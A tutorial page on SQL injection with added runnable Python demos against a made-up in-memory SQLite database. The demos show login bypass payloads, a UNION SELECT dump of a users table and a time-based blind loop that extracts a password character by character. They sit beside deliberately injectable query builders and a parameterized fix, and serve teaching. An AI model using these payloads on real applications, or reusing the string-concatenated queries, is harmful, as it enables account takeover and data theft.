SQL Injection
Definition:
SQL Injection (SQLi) is a code injection attack in which an attacker supplies crafted
input (for example in a username or password field) that the application incorporates
into an SQL query, so that the attacker controls part of the statement the backend
database executes.
Why it works:
An SQL statement is plain text in which data and commands are not separated. When the
application builds a query by concatenating user input into that text, the database
parses the whole string as one command, so quotes, operators and comment markers in the
input are interpreted as SQL rather than as data.
Where it occurs:
o Login forms
o Search boxes
o URL query strings
o Any area where user input is used to build SQL queries
Example:
Normal query (the submitted username is concatenated into the WHERE clause):
... WHERE username = 'john'
Injected input:
john' OR '1'='1
Modified query:
... WHERE username = 'john' OR '1'='1'
The condition '1'='1' is always true, so the WHERE clause matches every row instead of
only john's. Depending on where the query is used, an attacker can:
o Bypass authentication
o View, modify, or delete sensitive data
o Execute database administration operations
o Read system files on the server
o Execute OS-level commands (in some cases)
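The login example above worked in runnable code, as an added example that is not part of the original page. It assumes a constructed in-memory SQLite users table with two rows (john / s3cret and admin / hunter2) and hypothetical function names (login_vulnerable, login_safe); the vulnerable version splices the input into the SQL text exactly as described above, and the parameterized version shows why the same input then fails:

```python
import sqlite3


def setup_db():
    # Constructed sample data (not from the original page): two accounts.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("john", "s3cret"), ("admin", "hunter2")])
    return conn


def build_vulnerable_query(username, password):
    # Vulnerable on purpose: user input is spliced into the SQL text, so quotes,
    # OR and comment markers in the input become part of the command.
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "' ORDER BY id")


def login_vulnerable(conn, username, password):
    """Return the usernames the injectable query matched (empty list = login failed)."""
    rows = conn.execute(build_vulnerable_query(username, password)).fetchall()
    return [r[0] for r in rows]


def login_safe(conn, username, password):
    """Parameterized query: the SQL text is fixed and the driver passes the input
    as values, so a quote in the input can never change the command."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ? ORDER BY id",
        (username, password),
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    conn = setup_db()
    # The page's payload. Because AND binds tighter than OR, the WHERE clause becomes
    # username = 'john' OR ('1'='1' AND password = 'x'), so john's row matches
    # regardless of the password.
    payload = "john' OR '1'='1"
    print(build_vulnerable_query(payload, "x"))
    print("vulnerable:", login_vulnerable(payload and conn, payload, "x") if False else login_vulnerable(conn, payload, "x"))
    # A comment marker drops the password check entirely and picks the account.
    print("vulnerable:", login_vulnerable(conn, "admin' --", "x"))
    # The same payload in the password field makes the OR apply to every row.
    print("vulnerable:", login_vulnerable(conn, "", "' OR '1'='1"))
    print("safe:", login_safe(conn, payload, "x"))
```

Three things to take from running it: the payload in the username field logs in as john without his password; `admin' --` comments out the rest of the statement and logs in as admin; the payload in the password field returns every user. Against `login_safe` all three return nothing, because the input is bound as a value and never parsed as SQL.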
Types of SQL Injection (SQLi)
a. Error-based SQLi
Forces the database to raise an error whose message leaks query results or schema details.
b. Union-based SQLi
Appends a UNION SELECT with the same number of columns as the original query, so rows from
another table are returned inside the application's normal response.
c. Time-based blind SQLi
Injects queries that cause a delay in the server response if the condition is true.
Example: IF(condition, SLEEP(5), 0)
Measures response time to infer data, one true/false question at a time.
Useful when there is no visual change in the app response.
d. Out-of-band SQLi
Used when neither the response content nor its timing can be observed: the injected query
makes the database server itself send the data to an attacker-controlled host (for example
via a DNS or HTTP request).
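Union-based and time-based blind extraction against an injectable search box, as an added example that is not part of the original page. It assumes a constructed in-memory SQLite database (a products table the search box queries and a users table holding the secret), and because SQLite has no SLEEP(), a Python function is registered under that name to stand in for MySQL's SLEEP(); the page's `IF(condition, SLEEP(5), 0)` is written with SQLite's CASE WHEN. Function names (search_vulnerable, time_probe, extract_password) are hypothetical:

```python
import sqlite3
import time

DELAY = 0.2  # seconds the injected SLEEP() waits when the probed condition is true


def sleep_udf(seconds):
    # Stand-in for MySQL's SLEEP(): SQLite has no built-in sleep, so this Python
    # function is registered under that name (an assumption of this example).
    time.sleep(seconds)
    return 0


def setup_db():
    # Constructed sample data, not from the original page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("apple", 1.5), ("banana", 0.75)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'hunter2')")
    conn.create_function("SLEEP", 1, sleep_udf)
    return conn


def search_vulnerable(conn, term):
    # Deliberately injectable search box: the term is spliced into the SQL text.
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def union_dump_users(conn):
    # Union-based: 'zzz' matches no product, and the injected SELECT has the same
    # two columns as the original query, so users rows come back as search results.
    # The trailing "-- " comments out the leftover "%'" of the original statement.
    payload = "zzz' UNION SELECT username, password FROM users -- "
    return search_vulnerable(conn, payload)


def time_probe(conn, condition):
    # Time-based blind: the page's IF(condition, SLEEP(5), 0) as SQLite CASE.
    # The result set is empty either way; only the response time carries the answer.
    # The WHERE clause runs once per product row, so a true condition sleeps at
    # least DELAY seconds; a false one returns almost immediately.
    payload = ("zzz' OR (CASE WHEN (" + condition + ") THEN SLEEP(" + str(DELAY)
               + ") ELSE 0 END) -- ")
    start = time.monotonic()
    search_vulnerable(conn, payload)
    return time.monotonic() - start >= DELAY / 2


def extract_char(conn, position):
    # Binary-search one character of the admin password (printable ASCII 32..126)
    # using only the yes/no timing oracle: about seven probes per character.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        condition = ("(SELECT unicode(substr(password, %d, 1)) FROM users "
                     "WHERE username = 'admin') > %d" % (position, mid))
        if time_probe(conn, condition):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_password(conn, length):
    """Recover the first `length` characters of the admin password by timing alone."""
    return "".join(extract_char(conn, i) for i in range(1, length + 1))


if __name__ == "__main__":
    conn = setup_db()
    print("union dump:", union_dump_users(conn))
    print("time-based, first 3 chars:", extract_password(conn, 3))
```

The union payload returns the secret in one request because the search results are displayed. The time-based loop never sees any data in the response; it asks "is this character's code greater than N?" and reads the answer from whether the request was slow, which is why blind injection is slower but still works when the page shows nothing.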
Protection Against SQL Injection (SQLi) Attacks
Consequences of SQLi:
1. Loss of Confidentiality
o Sensitive data like usernames, passwords, credit card numbers can be leaked.
2. Bypass Authentication
o Attackers can log in as other users without knowing their passwords (e.g., using ' OR '1'='1).
3. Authorization Bypass
o Attackers can elevate privileges or access areas and data they are not authorized to use.
4. Loss of Integrity
o Data can be modified or deleted — affecting trust and system reliability.